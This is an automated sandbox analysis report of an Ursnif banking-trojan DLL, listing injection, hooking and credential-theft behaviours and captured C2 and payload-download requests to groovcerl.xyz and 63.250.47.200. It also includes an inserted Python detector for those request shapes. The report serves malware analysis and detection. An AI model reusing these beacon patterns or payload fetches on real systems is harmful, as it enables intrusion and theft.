Analysis Report vnaSKDMnLG

Overview

General Information

Sample Name: vnaSKDMnLG (renamed file extension from none to dll)
Analysis ID: 322748
MD5: c9d954b3f1c512e6804fd8f5637b58b6
SHA1: b452040d8072117ddbe1adf9e1eab5e4bdb150bd
SHA256: d7fafabbb381c34185ad30f0d5337ec8072d0705e0e9fb1d91e7358ed934fff3
Tags: dll, gozi, tr01, ursnif


Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Dot net compiler compiles file from suspicious location
Yara detected Ursnif
Allocates memory in foreign processes
Changes memory attributes in foreign processes to executable or writable
Compiles code for process injection (via .Net compiler)
Creates a COM Internet Explorer object
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Found Tor onion address
Hooks registry keys query functions (used to hide registry keys)
Injects code into the Windows Explorer (explorer.exe)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the export address table of user mode modules (user mode EAT hooks)
Modifies the import address table of user mode modules (user mode IAT hooks)
Modifies the prolog of user mode functions (user mode inline hooks)
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Suspicious Csc.exe Source File Folder
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Writes or reads registry keys via WMI
Writes registry values via WMI
Writes to foreign memory regions
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops certificate files (DER)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file does not import any functions
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Registers a DLL
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Suspicious Rundll32 Activity
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: vnaSKDMnLG.dll Avira: detected
Found malware configuration
Source: regsvr32.exe.4360.1.memstr Malware Configuration Extractor: Ursnif {"server": "12", "whoami": "user@536720hh", "dns": "536720", "version": "250166", "uptime": "167", "crc": "2", "id": "3050", "user": "0291816208f8d2d8cdc8873ad856765a", "soft": "3"}
Multi AV Scanner detection for submitted file
Source: vnaSKDMnLG.dll Virustotal: Detection: 11%
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_04A842B4 RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree, 1_2_04A842B4

Networking:

Creates a COM Internet Explorer object
Source: C:\Windows\SysWOW64\regsvr32.exe Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}
Source: C:\Windows\SysWOW64\regsvr32.exe Key opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}
Source: C:\Windows\SysWOW64\regsvr32.exe Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAs
Source: C:\Windows\SysWOW64\regsvr32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAs
Source: C:\Windows\SysWOW64\regsvr32.exe Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}
Source: C:\Windows\SysWOW64\regsvr32.exe Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}
Source: C:\Windows\SysWOW64\regsvr32.exe Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32
Source: C:\Windows\SysWOW64\regsvr32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32
Source: C:\Windows\SysWOW64\regsvr32.exe Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32
Source: C:\Windows\SysWOW64\regsvr32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32
Source: C:\Windows\SysWOW64\regsvr32.exe Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler
Source: C:\Windows\SysWOW64\regsvr32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler
Found Tor onion address
Source: powershell.exe, 00000016.00000003.416910277.0000020EA8E70000.00000004.00000001.sdmp String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1&dns=%s&whoami=%sMozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s); Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: explorer.exe, 0000001E.00000003.441296482.0000000002FB0000.00000004.00000001.sdmp String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1&dns=%s&whoami=%sMozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s); Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: control.exe, 0000001F.00000002.446120837.00000000006D5000.00000004.00000001.sdmp String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1&dns=%s&whoami=%sMozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s); Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 87.248.118.23 87.248.118.23
Source: Joe Sandbox View IP Address: 151.101.1.44 151.101.1.44
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c
Source: Joe Sandbox View JA3 fingerprint: 7dd50e112cd23734a310b90f6f44a7cd
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.47.200 (50 occurrences)
Source: global traffic HTTP traffic detected: GET /images/_2B9CjQr1xAViB33KLEZFl/2znYpePgiBaym/Zcv7ASeM/RH1S7KGYN6l8JiGWg4e9nXb/NQZq1SSxJi/mc5yp3cGYcmh41_2B/sgGwdOmEGgkx/5KQWfRKKgWK/Xt2u1awqIScbRf/sgOFy4dR5ErSJgERDDH7r/_2FEWj4i_2BFzqwq/_2BgPzFAK8qrY4B/dRdOEARjck/1iLUKWQnn/K.avi HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: groovcerl.xyzConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: groovcerl.xyzConnection: Keep-AliveCookie: PHPSESSID=d50vmo31p61r9jkm7vp6r303t1; lang=en
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: groovcerl.xyzConnection: Keep-AliveCookie: PHPSESSID=d50vmo31p61r9jkm7vp6r303t1; lang=en
Source: global traffic HTTP traffic detected: GET /images/GHw2NFoi/uGw7IwXJCQkcQl1KQVbo_2B/820znWDaSW/Ov_2B4z8yJqAozhde/qBE2ImkkKvCH/VXQwRoWXG5R/k9cBAONcCOy6zC/schMO1Bz6Hv1XAWY_2Bj1/Epe_2FrlHpFxpDqb/wkcRD0A5Nn7ZtOM/LcznbG_2FsTdDMEgaN/jIHJPS5D0/Fp7e0qKKctEIDJT6MGkX/RCGhIjX0.avi HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: groovcerl.xyzConnection: Keep-AliveCookie: lang=en; PHPSESSID=d50vmo31p61r9jkm7vp6r303t1
Source: global traffic HTTP traffic detected: GET /images/_2B5hZPBBeMEkvAROXtH1/WZsdWhoR7wg_2Bd_/2BoOtRydsyDG3r9/w2GcVR9gar6CncemWY/lVp7AN_2F/YEmcQ_2BEaBJyDUMlsGk/jN8oDN7xGQMygxh4f9g/_2FyagJjAZDLRvoreYuui8/LRxePg_2BGB0U/MpT06eFx/VfNkohToJFJcoGZ4_2Bgo5f/Opt0pN_2FL/JG_2FCiZ4ufIuI3kc/AT1ZiYCskKpp/v3TP_2FuS2b/9i.avi HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: groovcerl.xyzConnection: Keep-AliveCookie: lang=en; PHPSESSID=d50vmo31p61r9jkm7vp6r303t1
Source: global traffic HTTP traffic detected: GET /grab32.rar HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: 63.250.47.200Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /grab64.rar HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: 63.250.47.200Connection: Keep-AliveCache-Control: no-cache
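The HTTP lines above carry the two request shapes worth turning into detections: the C2 polls to groovcerl.xyz, whose paths are one long base64-looking blob cut into slash-separated chunks with `_2B` and `_2F` tokens in place of the base64 `+` and `/` characters, and the `/grab32.rar` and `/grab64.rar` fetches that go straight to 63.250.47.200 (no DNS query, as the report notes) with the `Mozilla/4.0 (compatible; MSIE 8.0; ...` User-Agent assembled from the format string found in memory. The following Python is an added example, not part of the Joe Sandbox report: it parses the request lines exactly as the report prints them (headers run together), reverses the chunking and escaping to recover the base64 payload, and flags both shapes. The mapping of `_2B`/`_2F`/`_0A` back to `+`/`/`/`=` (their `%XX` hex values) and the use of the first path segment as a decoy word are assumptions about the encoder, not facts the report states; the decoded bytes are still ciphertext, since the report exposes no key. The fourth input line is a constructed benign control.

```python
"""Detector for the Ursnif/ISFB C2 request shapes seen in this report.

Added example, not Joe Sandbox output.
"""
import base64
import re
from typing import Optional

# Constructed input: request lines copied in the form the report prints them
# (headers concatenated without line breaks), plus one benign control line.
SAMPLE_REQUESTS = [
    "GET /images/_2B9CjQr1xAViB33KLEZFl/2znYpePgiBaym/Zcv7ASeM/RH1S7KGYN6l8JiGWg4e9nXb/NQZq1SSxJi/mc5yp3cGYcmh41_2B/sgGwdOmEGgkx/5KQWfRKKgWK/Xt2u1awqIScbRf/sgOFy4dR5ErSJgERDDH7r/_2FEWj4i_2BFzqwq/_2BgPzFAK8qrY4B/dRdOEARjck/1iLUKWQnn/K.avi HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: groovcerl.xyzConnection: Keep-Alive",
    "GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: groovcerl.xyzConnection: Keep-AliveCookie: PHPSESSID=d50vmo31p61r9jkm7vp6r303t1; lang=en",
    "GET /grab32.rar HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: 63.250.47.200Connection: Keep-AliveCache-Control: no-cache",
    # constructed benign control, not from the report
    "GET /images/logo.png HTTP/1.1User-Agent: Mozilla/5.0Host: example.comConnection: Keep-Alive",
]

# Escape tokens observed in the report's paths. Mapping them back to '+', '/'
# and '=' (their %XX hex values) is an assumption about the encoder.
_ESCAPES = {"_2B": "+", "_2F": "/", "_0A": "="}
_IPV4 = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
_B64_ALPHABET = re.compile(r"^[A-Za-z0-9+/=]+$")


def parse_request(line: str) -> dict:
    """Extract method, path, Host and User-Agent from a run-together request line."""
    first = re.match(r"^(GET|POST) (\S+) HTTP/1\.[01]", line)
    host = re.search(r"Host: (.+?)(?=Connection:|Cookie:|Cache-Control:|$)", line)
    ua = re.search(r"User-Agent: (.+?)(?=Accept-Encoding:|Accept:|Host:|Connection:|$)", line)
    return {
        "method": first.group(1) if first else None,
        "path": first.group(2) if first else None,
        "host": host.group(1) if host else None,
        "user_agent": ua.group(1) if ua else None,
    }


def normalize_ursnif_path(path: str) -> Optional[bytes]:
    """Rebuild the base64 blob hidden in a chunked C2 path and decode it.

    Returns the decoded bytes (still ciphertext; no key is available here)
    or None when the path does not have the expected shape.
    """
    # Assumption: first segment ("images") is a decoy word, last part an extension.
    m = re.fullmatch(r"/[^/]+/(.+)\.[A-Za-z0-9]{2,4}", path)
    if not m:
        return None
    chunks = m.group(1).split("/")
    if len(chunks) < 4:  # heuristic: real beacons are split into many chunks
        return None
    joined = "".join(chunks)  # drop the chunking slashes first ...
    for token, char in _ESCAPES.items():  # ... then undo the escapes
        joined = joined.replace(token, char)
    if len(joined) < 64 or not _B64_ALPHABET.match(joined):
        return None
    joined += "=" * (-len(joined) % 4)  # tolerate stripped padding
    try:
        return base64.b64decode(joined, validate=True)
    except ValueError:
        return None


def classify(line: str) -> list:
    """Return the names of the indicators that fire for one request line."""
    req = parse_request(line)
    hits = []
    if req["path"] and normalize_ursnif_path(req["path"]) is not None:
        hits.append("ursnif_encoded_path")
    if (req["host"] and _IPV4.match(req["host"]) and req["user_agent"]
            and req["user_agent"].startswith("Mozilla/4.0 (compatible; MSIE 8.0;")):
        # Direct-to-IP fetch with the UA built from the binary's
        # "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s)" format string.
        hits.append("ie8_ua_direct_to_ip")
    return hits


if __name__ == "__main__":
    for sample in SAMPLE_REQUESTS:
        req = parse_request(sample)
        blob = normalize_ursnif_path(req["path"] or "")
        print(req["host"], req["path"][:32], classify(sample),
              f"{len(blob)} ciphertext bytes" if blob else "")
```

The first report path normalizes to 192 base64 characters, i.e. 144 ciphertext bytes, which is consistent with a block cipher payload; the favicon request on the same host and the benign control produce no hits, so the `_2B`/`_2F` path shape alone does the work for the C2 polls, while the `.rar` fetches are caught by the UA-plus-IP-literal rule rather than by the path.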
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: explorer.exe, 0000001E.00000000.437340795.0000000008BDA000.00000004.00000001.sdmp String found in binary or memory: :2020112520201126: user@https://www.msn.com/de-ch/?ocid=iehpMSN Schweiz | Sign in Hotmail, Outlook Login, Windows Live, Office 365 equals www.hotmail.com (Hotmail)
Source: explorer.exe, 0000001E.00000000.437340795.0000000008BDA000.00000004.00000001.sdmp String found in binary or memory: :2020112520201126: user@https://www.msn.com/de-ch/?ocid=iehpMSN Schweiz | Sign in Hotmail, Outlook Login, Windows Live, Office 365F equals www.hotmail.com (Hotmail)
Source: explorer.exe, 0000001E.00000000.437340795.0000000008BDA000.00000004.00000001.sdmp String found in binary or memory: :2020112520201126: user@https://www.msn.com/de-ch/?ocid=iehpMSN Schweiz | Sign in Hotmail, Outlook Login, Windows Live, Office 365\ equals www.hotmail.com (Hotmail)
Source: explorer.exe, 0000001E.00000000.437340795.0000000008BDA000.00000004.00000001.sdmp String found in binary or memory: :2020112520201126: user@https://www.msn.com/de-ch/?ocid=iehpMSN Schweiz | Sign in Hotmail, Outlook Login, Windows Live, Office 365}X equals www.hotmail.com (Hotmail)
Source: unknown DNS traffic detected: queries for: www.msn.com
Source: explorer.exe, 0000001E.00000000.439561975.000000000DC70000.00000002.00000001.sdmp String found in binary or memory: http://%s.com
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://amazon.fr/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 0000001E.00000000.439561975.000000000DC70000.00000002.00000001.sdmp String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://busqueda.aol.com.mx/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: powershell.exe, 00000016.00000003.416910277.0000020EA8E70000.00000004.00000001.sdmp, explorer.exe, 0000001E.00000003.441296482.0000000002FB0000.00000004.00000001.sdmp, control.exe, 0000001F.00000002.446120837.00000000006D5000.00000004.00000001.sdmp String found in binary or memory: http://constitution.org/usdeclar.txt
Source: powershell.exe, 00000016.00000003.416910277.0000020EA8E70000.00000004.00000001.sdmp, explorer.exe, 0000001E.00000003.441296482.0000000002FB0000.00000004.00000001.sdmp, control.exe, 0000001F.00000002.446120837.00000000006D5000.00000004.00000001.sdmp String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://corp.naukri.com/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: powershell.exe, 00000016.00000003.417318840.0000020EA8B38000.00000004.00000001.sdmp String found in binary or memory: http://crl.osofts/Microt0
Source: explorer.exe, 0000001E.00000002.527166930.00000000048F2000.00000004.00000001.sdmp String found in binary or memory: http://crl.pki.goog/GTS1O1core.crl0
Source: explorer.exe, 0000001E.00000002.512108234.0000000000EB8000.00000004.00000020.sdmp String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://de.search.yahoo.com/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://es.ask.com/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://es.search.yahoo.com/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://esearch.rakuten.co.jp/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://espanol.search.yahoo.com/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://espn.go.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://find.joins.com/
Source: explorer.exe, 0000001E.00000000.438578352.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://fr.search.yahoo.com/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://google.pchome.com.tw/
Source: explorer.exe, 0000001E.00000003.477391818.000000000E9DF000.00000004.00000040.sdmp String found in binary or memory: http://groovcerl.xyz/favicon.ico
Source: explorer.exe, 0000001E.00000000.440619372.000000000EE32000.00000004.00000001.sdmp String found in binary or memory: http://groovcerl.xyz/imaA
Source: explorer.exe, 0000001E.00000000.440619372.000000000EE32000.00000004.00000001.sdmp String found in binary or memory: http://groovcerl.xyz/images/GHw2NFoi/uGw#
Source: explorer.exe, 0000001E.00000000.437107057.0000000008A32000.00000004.00000001.sdmp String found in binary or memory: http://groovcerl.xyz/images/GHw2NFoi/uGw7IwXJCQkcQl1KQVbo_2B/820znWDaSW/Ov_2B4z8yJqAozhde/qBE2ImkkKv
Source: explorer.exe, 0000001E.00000000.420488752.0000000001400000.00000002.00000001.sdmp String found in binary or memory: http://groovcerl.xyz/images/_2B5hZPBBeMEkvAROXtH1/WZsdWhoR7wg_2Bd_/2BoOtRydsyDG3r9/w2GcVR9gar6C
Source: explorer.exe, 0000001E.00000000.437533934.0000000008C57000.00000004.00000001.sdmp String found in binary or memory: http://groovcerl.xyz/images/_2B5hZPBBeMEkvAROXtH1/WZsdWhoR7wg_2Bd_/2BoOtRydsyDG3r9/w2GcVR9gar6CncemW
Source: explorer.exe, 0000001E.00000000.437107057.0000000008A32000.00000004.00000001.sdmp String found in binary or memory: http://groovcerl.xyz/images/_2B9CjQr1xAViB33KLEZFl/2znYpePgiBaym/Zcv7ASeM/RH1S7KGYN6l8JiGWg4e9nXb/NQ
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://home.altervista.org/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://home.altervista.org/favicon.ico
Source: powershell.exe, 00000016.00000003.416910277.0000020EA8E70000.00000004.00000001.sdmp, explorer.exe, 0000001E.00000003.441296482.0000000002FB0000.00000004.00000001.sdmp, control.exe, 0000001F.00000002.446120837.00000000006D5000.00000004.00000001.sdmp String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
